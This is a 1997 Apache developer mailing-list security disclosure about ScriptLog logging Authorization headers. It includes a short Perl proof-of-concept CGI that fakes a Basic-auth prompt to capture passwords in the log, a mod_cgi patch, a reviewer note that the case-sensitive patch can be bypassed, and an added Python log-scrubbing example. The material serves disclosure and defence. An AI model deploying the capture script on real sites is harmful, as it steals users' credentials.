httpd-dev mailing list archives

From Rob Hartill <r...@imdb.com>
Subject security hole with ScriptLog
Date Sun, 12 Jan 1997 01:33:33 GMT

Apart from the fact that ScriptLog can dump the "Authorization" header
into the log when authorized scripts barf, it's not too difficult to
come up with ways to trigger Auth in other areas of the server to
capture passwords in the clear.

Here's a script that causes a 500 error when it thinks it's got the
password from the user..


#!/usr/local/bin/perl

open(GOTCHA, "+</tmp/grab");
while (<GOTCHA>) {
    chomp;
    if ($ENV{REMOTE_HOST} eq $_) {   # been here before? if so, die.
        exit;  # 500 error, password now in ScriptLog
    }
}

# Prompt the user for a password
print "Status: 401\r\nWWW-Authenticate: Basic realm=\"not-mine\"\r\n\r\n";

# remember who's been sent a 401
print GOTCHA "$ENV{REMOTE_HOST}\n"; close GOTCHA;

-=-=-=-=-=-

This'll cover the hole until someone works out a way to enable this feature
safely.

Index: mod_cgi.c
===================================================================
RCS file: /export/home/cvs/apache/src/mod_cgi.c,v
retrieving revision 1.4
diff -u -r1.4 mod_cgi.c
--- mod_cgi.c   1997/01/02 03:34:57     1.4
+++ mod_cgi.c   1997/01/12 01:29:12
@@ -212,6 +212,7 @@
     fputs("%request\n", f);
     for (i = 0; i < hdrs_arr->nelts; ++i) {
       if (!hdrs[i].key) continue;
+      if (!strcmp(hdrs[i].key, "Authorization")) continue;
       fprintf(f, "%s: %s\n", hdrs[i].key, hdrs[i].val);
     }
     if ((r->method_number == M_POST || r->method_number == M_PUT)
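Review bot: the added `strcmp(hdrs[i].key, "Authorization")` is case-sensitive, but HTTP field names are case-insensitive and the key in `hdrs[]` keeps whatever casing the client sent, so a request carrying `authorization:` still gets its credentials written to the ScriptLog. Use `strcasecmp(hdrs[i].key, "Authorization")` for the skip, and consider skipping `Proxy-Authorization` the same way, since it carries credentials too.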

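An added example, not from Rob's message or from Apache's sources: a small Python scrubber that finds credential headers already written into a ScriptLog (matching the header name case-insensitively) and redacts their values, assuming only the `%request` / `Key: value` layout the mod_cgi hunk writes; SAMPLE_LOG is a constructed entry.

```python
import re

# Added example (not part of the original message or of Apache). It relies
# only on the layout the mod_cgi hunk writes: a "%request" marker followed by
# "Key: value" lines, ending at a blank line or the next "%..." marker.

# Request headers that carry credentials. Compared case-insensitively, since
# HTTP field names are case-insensitive and "authorization:" leaks just as well.
SENSITIVE = {"authorization", "proxy-authorization"}

HEADER_RE = re.compile(r"^([^:\s]+):\s*(.*)$")

def scrub_scriptlog(text):
    """Return (scrubbed_text, findings).

    findings lists (line_number, header_name) for each credential header in a
    %request block; its value is replaced with [REDACTED] in scrubbed_text.
    """
    out, findings = [], []
    in_request = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip() == "%request":
            in_request = True
        elif in_request and (line.strip() == "" or line.startswith("%")):
            in_request = False  # end of the request-header block
        elif in_request:
            m = HEADER_RE.match(line)
            if m and m.group(1).lower() in SENSITIVE:
                findings.append((lineno, m.group(1)))
                line = "%s: [REDACTED]" % m.group(1)
        out.append(line)
    return "\n".join(out) + "\n", findings

# Constructed ScriptLog entry for a CGI that exited with a 500 after the
# browser re-sent the credentials it had been prompted for.
SAMPLE_LOG = """%% [Sun Jan 12 01:30:00 1997] GET /cgi-bin/grab HTTP/1.0
%% 500 /cgi-bin/grab
%request
Host: www.example.com
authorization: Basic dXNlcjpzZWNyZXQ=
User-Agent: Mozilla/3.0
%response
Status: 401
WWW-Authenticate: Basic realm="not-mine"
"""

if __name__ == "__main__":
    scrubbed, found = scrub_scriptlog(SAMPLE_LOG)
    print("%d credential header(s) redacted" % len(found))
    print(scrubbed, end="")
```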
